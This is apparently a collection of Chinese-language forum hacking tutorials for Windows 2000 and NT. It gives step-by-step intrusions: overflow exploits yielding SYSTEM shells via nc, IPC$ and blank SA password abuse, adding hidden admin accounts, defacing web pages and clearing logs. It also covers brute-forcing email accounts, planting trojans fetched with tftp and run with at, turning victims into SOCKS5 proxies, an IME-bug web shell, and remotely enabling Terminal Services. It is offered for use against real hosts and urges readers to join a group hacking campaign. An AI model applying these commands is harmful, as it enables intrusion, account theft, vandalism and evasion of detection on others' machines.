（4）IDA溢出漏洞
所用程序：idahack
進入MS-DOS方式（假設idq.exe在c:\下）
c:\idahack.exe
運行參數：c:\idahack
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
Good luck ?;
好，現在你可以telnet它的80端口了，我們用NC來連接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
（C）版權所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK，現在我們現在上來了，也可IDQ一樣是SYSTEN權限，盡情的玩吧。

（5）.printer漏洞
這個漏洞，我們用兩個程序來入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,

usage: D:\IIS5HACK.EXE
用法: D:\IIS5HACK <溢出的主機> <主機的端口> <主機的類型> <溢出的端口>
chinese edition:   0
chinese edition, sp1: 1
english edition:   2
english edition, sp1: 3
japanese edition:   4
japanese edition, sp1: 5
korea edition:   6
korea edition, sp1: 7
mexico edition:   8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
good luck

溢出成功！
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK，我們又成功取得system權限！玩吧。

（6）139端口入侵
我們先確定一台存在139端口漏洞的主機。用掃描工具掃描！比如SUPERSCAN這個端口掃描工具。假設現在我們已經得到一台存在139端口漏洞的主機，我們要使用nbtstat -a IP這個命令得到用戶的情況！現在我們要做的是與對方計算機進行共享資源的連接。
用到兩個NET命令，下面就是這兩個命令的使用方法
NET VIEW?
作 用：顯示域列表、計算機列表或指定計算機的共享資源列表。?
命令格式：net view [\\computername | /domain[:domainname]?
參數介紹：?
<1>鍵入不帶參數的net view顯示當前域的計算機列表。?
<2>\\computername 指定要查看其共享資源的計算機。?
<3>/domain[:domainname]指定要查看其可用計算機的域?

NET USE?
作用：連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息。?
命令格式：net use [devicename | *] [\\computername\sharename[\volume]?
[password | *] [/user:[domainname\]username] [/delete] |?
[/persistent:{yes | no]}?
參數介紹：?
鍵入不帶參數的net use列出網絡連接。?
devicename指定要連接到的資源名稱或要斷開的設備名稱。?
\\computername\sharename服務器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。?
domainname指定另一個域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網絡連接。?
/persistent控制永久網絡連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經看到對方共享了他的C，D，E三個盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現在我們已經得到的139端口漏洞的主機IP地址和用戶名，現在就該是我們進入他計算的時候了，點擊開始---查找--計算機，將剛才找到的主機名字輸入到上面，選擇查找，就可以找到這台電腦了！雙擊就可以進入，其使用的方法和網上領居的一樣。

（7）IPC入侵
所有程序：流光
開始：在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項，或者直接按Ctrl+R。輸入我們要破解的IP段，我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲得IPC弱口令，這樣可以加快掃描的速度 ：）填入IP，選擇掃描NT/98主機。在“輔助主機”那裡的“IPC$主機”前面打勾,然後在菜單了選“探測”，，掃描出結果以後，“IPC$主機”，選中後按“CTRL+F9”就開始探測IPC用戶列表。會出現“IPC自動探測”
的窗體，把那兩個選項都選了，然後點“選項” 為了加快弱口令掃描速度，這裡的兩個選項我們可以全部取消記住。然後點“確定”出來後點“是”就開始探測了。一會兒，結果出來了。比如我們探測出了用戶名為“admin”的管理員，密碼為“admin”，現在我們用命令提示符，熟悉下命令吧，輸入:
net use　file://對方ip/ipc$ "密碼"　/user:"用戶名" || 建立遠程連接
copy icmd.exe file://對方ip/admin$ 　 ||　admin$是對方的winnt目錄
net time file://對方IP/       ||　看看對方的本地時間
at file://對方ip/ 啟動程序的時間　啟動程序名 啟動程序的參數   ||　用at命令來定時啟動程序
telnet 對方ip　端口

我們也可以改網頁：
net use \\ip\ipc$ "admin" /uesr:"admin" 回車。
出現“命令成功完成”。
然後輸入“dir \\ip\c$\*.*”
看到C:下所有內容。現在我們來改主頁。一般主頁放在c:\inetpub\wwwroot裡面
輸入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.這些就是主頁了，假如你黑頁在C:下，就輸入"copy 主頁文件 \\ip\c$\inetpub\wwwroot"覆蓋原文件這樣就行了，簡單吧？

日志清除，斷開連接 ：
我們copy cl.exe ，clear.exe 上去，再執行，就可以清除日志，比如clear all ：清除所有的日志。然後在斷開連接：net use file://ip/ipc$ /delete

（8）超管SA空密碼漏洞
使用的工具:流光IV
啟動流光，按Ctrl+R。出現掃描設置對話框，設置掃描IP段，並且選擇掃描的類型為SQL。點擊“確定”，進行掃描，假設我們取得主機：127.0.0.1，然後點擊“工具” —— SQL遠程命令（或者Ctrl+Q），填入主機IP（127.0.0.1）、用戶（sa）、密碼（空）點擊“連接”，出現遠程命令行的界面。
net user heiying heiying1 /add     填加一個heiying的帳號和密碼heiying1
net localgroup administrators heiying /add 將我們創建的heiying帳號填加到管理組。
下面我們來做跳板：
打開cmd.exe,輸入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
顯示命令成功完成。
上傳srv.exe：
copy srv.exe \\127.0.0.1\admin$\system32
上傳ntlm.exe：
copy ntlm.exe \\127.0.0.1\admin$\system32
啟動服務：
首先用net time \\127.0.0.1
看看對方主機的時間,(假如回顯\\127.0.0.1 的本地時間是上午12.00)，然後我們用at \\2127.0.0.1 12.01 srv.exe命令來啟動srv.exe。等一分鐘後就可以telnet了。
一分鐘後在本機命令提示符中輸入：
telnet Ｘ.Ｘ.Ｘ.Ｘ 99
然後我們要啟動NTLM.exe：
在telnet狀態下直接輸入ntlm回車。
顯示：windows 2000 telnet dump,by assassin,all rights reserved.done!
然後從新啟動對方主機的telnet服務：net stop telnet（先關閉telnet服務）再輸入net start telnet（啟動telnet服務）然後我們退出telnet，然後在命令行下輸入telnet 127.0.0.1,依照提示,接著輸入用戶名：heiying,密碼：heiying1，回車。這樣,我們的跳板就做好了，簡單吧？
（上面上傳的srv和ntlm等東東還有一個簡便方法，全都可以直接用流光工具菜單裡的種植者上傳，60秒後自動運行，不用敲命令！呵呵~~~~方便吧！）

（9）如何用流光破解信箱密碼
這次的目標是21CN，運行流光IV，選擇POP3主機----右鍵----編輯----添加，填上：pop.21cn.com，其他的就用默認吧！不用更改，確定就行了。到下一步，還是右鍵-----從列表中添加------選擇一個字典，沒有的到網上下載一個字典，或者到黑白網絡去下載，我們用簡單模式探測！這樣速度比較快，然後就等著成果吧，上次我以下就破了5個郵箱出來。

（10）frontpage進行攻擊
打開您自己的Frontpage，文件菜單下選擇“打開站點”，然後在文件夾框裡寫入http://127.0.0.1（http://不要漏掉）。按下“打開”按鈕，一會後，出現了文件夾，成功了，現在就可以操作網頁文件了。如果跳出錯誤信息，表示有密碼，我們用以下http://127.0.0.1/_vti_pvt/service.pwd,這是默認的密碼文件，下載下來，找個解密器破密碼吧！破出來後就還可以改網頁。這個只能改該網頁，沒什麼玩的。

（11）用肉雞做ＳＯＣＫ５代理跳板
需要軟件：srv.exe，ntlm.exe，snakeSksockserver.exe，SocksCap.exe。
首先我們在命令提示符下建立IPC$管道：
net use \\127.0.0.1\ipc$ "密碼" /user:帳號
通道建立好後，我們把srv.exe sss.exe ntlm.exe全部上傳。
c:\copy srv.exe \\10.10.10.10\admin$
1 files copied!
c:\copy ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\copy sss.exe \\10.10.10.10\admin$
1 files copied!
復制完畢後，
看肉雞上現在的時間：
c:\net time \\127.0.0.1
顯示當前時間是 2002/4/13 晚上 09：00
我們來啟動srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09：01後。我們來連接肉雞：
c:\telnet 127.0.0.1 99
連上後顯示：
c:\winnt\system32>
接著我們啟動NTLM.exe
c:\winnt\system32>ntlm
顯示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我們終止srv.exe的telnet服務：
C:\WINNT\system32>net stop telnet
繼續：
C:\WINNT\system32>net start telnet
再啟動TELNET。
OK，我們來登陸
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了，一切順利，我們現在正式開始做代理：
c:>sss.exe -install <---------開始安裝
顯示：
c:>sksockserver installed!
來看看配置：
c:>sss -config show
顯示：
SkServer Port = 1813   <----開放服務的端口 ,我們記著這個1813端口哦
SkServer StartType: 3 - Manual   <---服務啟動方式
SkServer Enable Client Set Num:0   <---客戶端的項目個數
SkServer Pass SkServer Number:0   <---經過SkServer的項目個數

來啟動服務：
c:>net start skserver
提示你正在啟動，並且完成。
來檢查一下是不是啟動了：
c:>net start         <-----------看看啟動的服務列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它，呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了，到這裡我們已經做好了一個socks5代理了，我們自己的哦.OK，下面我們用sockscap來使用我們做代理。
安裝好SocksCap後，我們在桌面上打開SocksCap V2，點開File選項選Settings...彈出卡片，在 SOCKS Server裡面我們填肉雞的IP：127.0.0.1，PortT填默認的1813端口，下面的我們選socks version 5，呵呵，和 Attempt local then remot,這是域名解析的順序，先本地，然後才遠程。設置完了點“確定”我們就可以使用了，添加應用程序到sockscap裡面，點開那個"new"按鈕，會彈出一個卡片，
Profile name ：程序名，隨便寫。
Command Line: 命令行，點後面的Browse...找到你的程序路徑
Working:填好上面那個，這個就自動加上.
這樣我們就把程序加到SocksCap裡面了。
現在們可以雙擊裡面的程序來使用，也可以選住程序在點"Run"來運行。

好了，終於寫完了，上面的內容都很簡單，很適合初學者，還望高手們不好見笑，剛好聽說這次5.1有很多聯盟有所行動，希望上面的內容能教會一部分人，少走彎路，讓更多的人參與這次行動。UNIX和LINUX由於自己的功力也還不夠，還差很遠，所以還不敢寫。

利用WIN2000的輸入法漏洞在別人機子上跳舞
下面我來講講如何利用輸入法漏洞遠程入侵開了終端服務的windows 2000的機器：

首先我們確定某台機器的3389端口是開放的：

D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx

Starting nmapNT V. 2.53 by [email protected]

eEye Digital Security ( http://www.eEye.com )

based on nmap by [email protected] ( www.insecure.org/nmap/ )

Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):

Port State Service

3389/tcp open msrdp

Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds

D:\TOOLS\nmapNT\Nmapnt>

現在我們已經可以看到這台機器的終端服務是開放的，那麼我們就可以開始行動了。

打開終端服務客戶端，添上IP地址，選擇連接。

稍等片刻，一般是很快的，就會出現熟悉的登陸對話框了，這是我們看看有沒有輸入法的漏洞。有關輸入法的漏洞請參看相關文章。如果有輸入法漏洞那麼我們如何取得控制權呢？經過多次的研究試驗。終於想出了一個辦法。我們發現在跳至url後，我們雙擊winnt目錄下的explorer.exe並沒什麼反應（是機上已經運行了，可是我們為什麼看不到結果呢？），如果我們不斷的進行雙擊，或者什麼也不做，一會兒連接將被斷開，在斷開的一霎那，我們似乎看到了我們雙擊出來的窗口。經過幾次試驗，我們發現不登陸進去是不行的，將會被服務端斷開。於是想辦法先登陸進去，我想到了在幫助中打開用戶管理器，經過試驗，在跳至url中添入：mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm

在右側會出現一個可以打開本地用戶和組的管理器的鏈接，本來在正常情況下是可以打開這個管理器的，

可是在沒有登陸進去的時候就是出不來，於是想另外的辦法。終於想到了建立一個命令行的快捷方式。在跳

至url中輸入：c:\winnt\system32，然後找到net.exe，右鍵點擊net.exe，選擇創建快捷方式，於是創建了

一個文件名為快捷方式net.lnk的文件，然後再右鍵點擊這個快捷方式，選擇屬性，這時我們就可以輸入我們

的命令了。在目標中添入我們要執行的命令的路徑和參數就行了，我們還是用net命令，因此不必改路徑了，

添加個賬號test的命令如下，C:\WINNT\system32\net.exe user test/add。密碼為空。然後雙擊這個快捷方

式運行它。然後我們把這個賬號添加到administrators組中，

C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再運行。我們現在已經基本上成功了，

關掉幫助窗口，用test賬號登陸，密碼為空。進去後我們把剛才建的快捷方式刪掉。然後再將本地用戶的

TSinternetuser賬號加進administrators組中，設置密碼。這樣我們下次就可以用這個賬號進來了。然後

再用這個賬號登陸一下，如果能夠登陸，就刪掉剛剛建立的test賬號。

這台機器就這樣控制在我們的手裡了。。。。。。

方法二：

其過程如下：

1.掃描 3389 port 終端服務默認；

2.用終端客戶端程序進行連接；

3.按ctrl+shift調出全拼輸入法（其他似乎不行），點鼠標右鍵（如果其幫助菜單發灰，就趕快趕下家吧，人家打補丁了），點幫助，點輸入法入門；

4.在"選項"菜單上點右鍵--->跳轉到URL"，輸入：c:\winnt\system32\cmd.exe.（如果不能確定NT系統目錄，則輸入：c:\ 或d:\ ……進行查找確定）；

5.選擇"保存到磁盤" 選擇目錄：c:\inetpub\scripts\，因實際上是對方服務器上文件自身的復制操作，所以這個過程很快就會完成；

6.打開IE，輸入：http://ip/scripts/cmd.exe?/c dir 怎麼樣？有cmd.exe文件了吧？這我們就完成了第一步；

7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat

8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat

9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat

10.http://ip/scripts/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下：

net user guest /active:yes

net user guest elise

net localgroup administrators /add guest

11.在"選項"菜單上點右鍵--->跳轉到URL"，輸入：c:\inetpub\scripts\go.bat --->在磁盤當前位置執行；

12.呵呵，大功告成啦，這樣我們就激活了服務器的geust帳戶，密碼為：elise，超級用戶呢！ （我喜歡guest而不是建立新帳戶，這樣似乎不易被發現些），這樣你就可用IPC$連接，想怎樣做就怎樣做了，當然，你也可用guest直接登陸到他的服務器，到他機器上去跳舞吧：）

　

方法三：

用端口掃瞄程序掃IP的3389端口，得到xx.xx.xx.xx。

　 2、運行windows2000終端客戶程序，在服務器輸入框裡填入：xx.xx.xx.xx ，連接。

　 3、出現windows2000的登陸窗口，按下CTRL+SHIFT鍵，出現全拼輸入法。

　 4、在輸入法狀態條上按mouse右鍵，選擇幫助，選擇輸入指南，選擇"選項"按右鍵。

　 5、選擇"跳轉到URL"，輸入：c:\winnt\system32\cmd.exe.

　 6、選擇"保存到磁盤"。

　 7、選擇目錄：c:\inetpub\scripts\

　 8、打開IE，輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ （知道了吧）

　 9、輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp

10。OK

一次簡單入侵
又是一個休息日，閒得無聊，打開電腦，看了幾大門戶站的八卦新聞，愈看愈覺就得沒勁。做點啥趣事呢？有了！前幾天一OICQ聊友叫我幫忙搞定一主機，一直懶得搞，那麼現在就去找找這主機的晦氣吧。
看看這主機是否是網站先，用IE打開它的IP：61。170。168。168，出現“該頁無法顯示”。看來這主機還沒WEB網頁。祭起我的“X-SCAN”寶刀，全面掃描一下它的各種漏洞，我就不信他沒有漏洞！（玩黑必備一：眼睛長到頭頂上）
X-SCAN掃描結果報告：
“端口開放：1433、3389
ASP 漏洞：don't find CGI漏洞： don't find IIS漏洞don't find……，SQL：SA /NULL”
呵呵，大局已定，大家看到了有哪些漏洞嗎？什麼，你不懂鳥語？哇噻，你先去補習鳥語再到我這來！對了，我們的白靈、流二位大蝦精通由各種亂碼加鳥語組成的火星ASP語言，聽說二位不日將移民火星，你趁他們還在地球快去拜師學藝啊！
再接著賣我的黃婆爛瓜……
3389——我得最愛！利用遠程主機打開的遠程控制功能（通過3389連接）進入它的WINDOWS圖形界面，這種感覺對我等菜鳥來說可不是DOS破界面能比的哦~~
廢話少說，打開我的“WINDOW2000遠程客戶程序”，填IP、點“聯接”~~啊？連不上！再連~~還是不行！55555……輸入法漏洞是玩不成了。
一招不行再換一招！點根煙先……打開“天行網絡”所制的精品軟件——SQLEXEC，填上IP，用戶名：SA，密碼為空，點“連接”---“：（連接成功！”
進來了，談笑間我就進來了，我真厲害~~（玩黑必備二：自誇不怕嚇死人）。先看看它的C盤的文件：DIR C：，OK！這機子裝的是WINNT，怪不得我用WIN2000的遠程客戶程序連不上，可是它怎麼會打開WIN2000的遠程連接用端口-3389端口呢？
算了，越想越亂，忙我的正事吧。
為安全起見，讓我看看它建立了哪些連接進程：“netstat -n”……哈，反饋回來的信息都是一些196開頭的IP，沒開TTY監聽，這該不會是個局域網的服務器吧？
再來看看我現在的權限有多少：“net user aaa 1234 /add”－－－“成功建立新用戶”。呵呵，權限還不小，能建新用戶哦~~由於我機子用的是WIN98，所以沒法用這新建的用戶名為AAA，密碼為1234的帳戶進行連接，這帳戶對我來說根本
沒用……
現在，我們即將開始取得遠程主機的最最最……大權限！啥？你不信？呵呵，說你菜你還不高興，聽說過木馬嗎？聽說過大名鼎鼎專玩木馬的“符號”大蝦嗎？哦，你不知木馬只知符大蝦……行，趕明兒我讓符大蝦在你機子裡也放個木馬，這樣你就
能深刻理解啥叫木馬了~~
繼續攻擊……我們現在就要上傳個木馬到遠程主機。木馬“廣外女生”現在國內很流行，前幾天也曾去黑網下栽了一個，它的被控端程序才90K，上傳比較容易，就用它做遠程主機的“後門”吧。1。打開TFTP（一個能把你的PC變成FTP服務器的小程序）——
2。把“廣外女生”的被控端程序gw.exe復制到我的C盤TFTP默認文件路徑下。3。在遠程主機裡輸入命令："tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe"
5分鐘後，GW。EXE已乖乖在躺在遠程主機的C盤裡了~~~
現在，得想法子運行GW。EXE：1。打入命令"net time"---遠程主機反饋當前時間"09:35"。 2.打入程序起動時間命令"at 09:37 c:\gw.exe"（GW在9：37運行）——出現主機反應：“建立一個新任務，ID=1”
OK！二分鐘後將運行我的“廣外女生”了！
打開我的“廣外”控制端程序，在主機查找欄裡填上“61.170.168.160---61.171.168.170”，點“查找”。掃描很慢……別急……掃完了……啊？！在這掃描的IP端裡無中“獎”主機！怪事啊！是遠程主機的“廣外”沒有運行還是我對這控制端程序的操
作錯誤？一定是這破“廣外”本身程序不行，太爛了~~（玩黑必備三：一切都不是我的錯！）。
看來，今天我只得請出封存已久的國貨精品木馬——“冰河”了。我的“冰河2。2”的被控端有200多K，估計上傳時間會很久，但如果上傳成功，它的功能可不是“廣外”所能與之並論的啊！另外，對冰河的界面操作也不會似“廣外”那嚒陌生……
言歸正傳，現在開始上傳“冰河”：“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe"（為不至於太過醒目，這次把文件傳到C盤的INETPUB文件包下）
緩慢上傳中……讓我再點根煙，趁這功夫去“黑白網絡”的技術論壇逛逛去……
已過25分鐘了，進遠程主機瞧瞧是否已下栽成功了~~OK！冰河已在那裡了。接著：“net time”，反饋信息：10:30”。“at 10:32 c:\inetpub\GG.exe”，反饋信息“運行新任務，ID=1”
二分鐘後，打開“冰河”控制端，加入遠程主機IP，連接……成功！接著再：添加服務器端連接密碼、添加冰河運行自動通知發往信箱、刪除“廣外”、“冰河”被控端程序。
……
現在，這主機的一切已盡在我眼前了，真爽啊！明天，我也許會把一個SOCK5代理的服務器端程序放進這主機，大家以後要是想用SOCK5代理，又懶得去漫無目標的查找的話，請找我，我會把我這個人專用“肉機”貢獻出來的。
遠程CMD下安裝終端服務TS

============================================
記得好多人說過關於CMD下安裝終端的事，但一直沒能成功。但他家都說好使.我現在可以明明白白的告訴大家了！這種方法可行，但是是有條件的！
其條件是：
其計算機要安裝了3389但是沒有啟動！
也就是說，如果對方沒有安裝3389，這種方法是不可能的！
我現在正在研究在CMD下無人安裝終端服務！反復折騰N遍，終於理清了這個安裝需要哪些文件了，見下：
所需文件清單：
BHP001.IN_
BHP005.IN_
BHP006.IN_
BHP007.IN_
BHP008.IN_
BHP013.HL_
BHP015.IN_
BHP017.IN_
BHP018.IN_
BHP024.IN_
BHSUPP.DL_
DEFAULT.AD_
DEFAULT.CF_
DEFAULT.DF_
HEXEDIT.DL_
MCAST.DL_
NETMON.IN_
NETMON2.CH_
NMSUPP.DL_
PARSER.DL_
PARSER.IN_
SLBS.DL_
這個是 W2K ADV SERVER 的文件，對於這個安裝，解壓後的文件沒用，必須要壓縮格式的文件（奇怪），更可氣的是，安裝程序沒有復制任何文件到系統裡（除了TEMP目錄，呵呵），在WINNT目錄下有個文件叫 setupapi.log，從中也可以看出，對上述這些文件的復制全部失敗（文件內容較多，我就不貼了），但安裝卻成功了...這個是從光盤上安裝的，要遠程安裝，總不能電話通知管理員放光盤吧 ，於是把這些文件COPY到SYSTEM32目錄下，再裝，還是彈出對話框。。。由此確定系統中某處肯定保留了最初安裝W2K時的安裝路徑
果然在注冊表中找到了，見下：

Root Key:
HKEY_LOCAL_MACHINE\

Subkey :
SOFTWARE\Microsoft\COM3\Setup
SOFTWARE\Microsoft\MSDTC\Setup
SOFTWARE\Microsoft\Transaction Server\Setup(OCM)
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup

KeyName:
SourcePath

Keyvalue:
F:\SIMPCHIN\WIN2000\ADV_SRV\

注意：Keyvalue 不包含“i386”，安裝時會自動加上這個路徑。

對於 sysocmgr 安裝程序而言，所需要的是 SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
於是，在 D:\ 新建一目錄為 i386 ，把上述文件COPY進去，再把這個注冊表項的值改為 D:\，卸載TS，再安裝TS

最後，再簡單說一下命令行下安裝TS的過程，首先，要感謝 小青豆，是他教我如何遠程修改注冊表的，向他致敬！
先在命令行下建立兩個 answer file，如下：
echo [Components] > c:\aa
echo TSEnable = off >> c:\aa

echo [Components] > c:\bb
echo TSEnable = on >> c:\bb

注：文件 aa 是用來卸載TS的，文件 bb 是用來安裝TS的，路徑隨意，只要和下述命令中的一致即可。

然後鍵入：
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\aa /q
重起完成後，鍵入
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bb /q

注：c:\winnt\.... 這個路徑根據實際情況需更改，如果不希望立刻重起，在 /q 後加上 /r 參數。

再談3389 !
如今都抱怨3389的肉雞不好找了.原來的時候俺也沒玩過! 偶見俺個死黨玩的入迷.沒辦法也來試試.結果現在的進展.. 兩天拿下了三十二台.而且)______ 速度沒有小於十M的,
說說方法吧,你整個聊天室了,或到網上查一下寬帶了,先搞出這個地段寬帶的IP,下面的事就好辦多了,隨便整個掃描器讓其只掃3389端口.現在大部分寬帶的用戶和電信的大哥們都是這個~~125*2
好了利用這點時間我們做一件事,自己有FTP空間的話上傳一個批命令,裡面這樣寫 net user abc abc /add
net localgroup administrators abc /add
以上的意思大家應該都明白吧就是建立一個密碼為ABC的用戶ABC並將其加入到管理員組， 然後另存為1。BAT，傳到你的空間上。
OK我們現在看看掃描結果，登陸到一台機器，輸入法切換，調出幫助文件，空白處點擊鼠標的右健，選“跳至URL”在出來的輸入檔裡打上我們的剛才上傳的1。BAT的地址，***。***。***。***/1。BAT。選擇，在當前打開。OK了現在你可以用ABC賬號登陸他的機器了。登陸以上要做的事：
http://download.microsoft.com/downl..._SP2_x86_CN.EXE先給他打上輸入法補丁
local-machine->software->microsoft->winnt->currentversion->winlogon

DontDisplayLastUserName:1
修改注冊表相應健值,這樣網管就不會查到你了
呵呵
怎樣可以遠程打開對方的3389端口
如果對方的端口有開放:
telnet 192.168.0.1
輸入用戶名/密碼
C:\>
\\成功進入!!!!
進入後,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.

這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1     console   0 運行中 .   2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.

好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s   //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s   //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa  
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa      
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.

如果一切正常的話,幾分鐘後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了.

這裡還有兩種方法
第一種開啟的辦法:
使用DameWare Mini Remote Control遠程連接上,
在"終端服務配置"裡,重新啟用RDP連接,馬上就可以使用3389了.
第二種開啟的辦法:
修改遠程注冊表.
比如:
主機IP: 192.168.0.1
已有的帳號和密碼: wawa/7788
首先與遠程主機建立連接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打開本機注冊表
"開始"==>"運行"==>regedit
在"注冊表"下拉菜單中選擇"連接網絡注冊表"
在"計算機名"中輸入 \\192.168.0.1
這樣就進入了遠程主機注冊表.
現在我們找到這裡:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
將fEnableWinStation值由0改為1

SQLEXEC或telnet進入後,檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.
這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1     console   0 運行中 .   2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.
好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s   //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 字節
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s   //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
-----------------------------------------------------
c:\>echo [Components] > c:\wawa  
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa      
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.

如果一切正常的話,幾分鐘後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了.

突破3389

 

不過很多人會有疑問，使用3389當然好了。可是Windows 2000的專業版是沒有3389的功能的，你怎麼開？如果您能夠思考到這一步就說明您已經具有相當的黑客天賦了。Windows 2000的專業版本的確沒有3389的功能，所以在我們在使用MS04-11溢出成功後想要開3389端口作為自己的遠程控制的手段就需要在多費一番功夫了。首先利用MS04-11漏洞溢出之後我們至少可以使用Telnet之類的服務，如果你直接輸入Ver命令只能夠看到它Windows的補丁版本號，是無法看到具體的系統版本號馬的，因此我們必須通過使用type這個命令打開系統中的Boot.ini文件判斷一下作系統的Windows版本，在Boot.ini中的最後會顯示：

[boot loader]

timeout=5

default=multi(0)disk(0)rdisk(0)partition(1)\WINNT

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Professional" /fastdetect /noguiboot

我們可以輕松的判斷出該作系統應該是Windows 2000 Professional。在確定是Professional版本後，不過不要傷心Windows 2000 Professional一樣可以通過手段讓其打開3389服務。其實Windows 2000中，無論任何一個版本，它們的多數程序都是一樣的，Server版本的Windows 2000和Professional的更為相似，它們的唯一不同僅僅局限在注冊表上，我們只要在Professional的注冊表中動一些手腳就可以讓Professional變成Server。3am Laboratories公司制作的NTSwitch就是一個可以讓Windows 2000 Professional變成Server版本的好工具。

不過如果手頭上沒有工具我們也可以進行手動的修改，首先我們需要自己生成一個注冊表升級升級文件。我們先將自己的作系統安裝為Windows 2000 Professional，使用注冊表照相機Regsnap這個工具對注冊表和整個系統生成報告，然後在找到Windows 2000 Server的安裝光盤，將Windows 2000 Professional作系統升級為Windows 2000 Server，在作系統升級完成後，再一次使用Regsnap對注冊表進行進行照像，然後在下載RegShot這個注冊表分析軟件將照的注冊表提取分析，輸出分析出的變化結果的差別文件，將差別文件保存為yu.reg。再一次用Telnet登陸溢出的目標計算機，然後上傳我們保存好的差別注冊表，在對方的作系統中輸入［regedit.exe /s yu.reg］這串命令，此時對方的計算機就升級為Windows 2000 Server了，而你也可以順利的開啟對方的3389服務了。

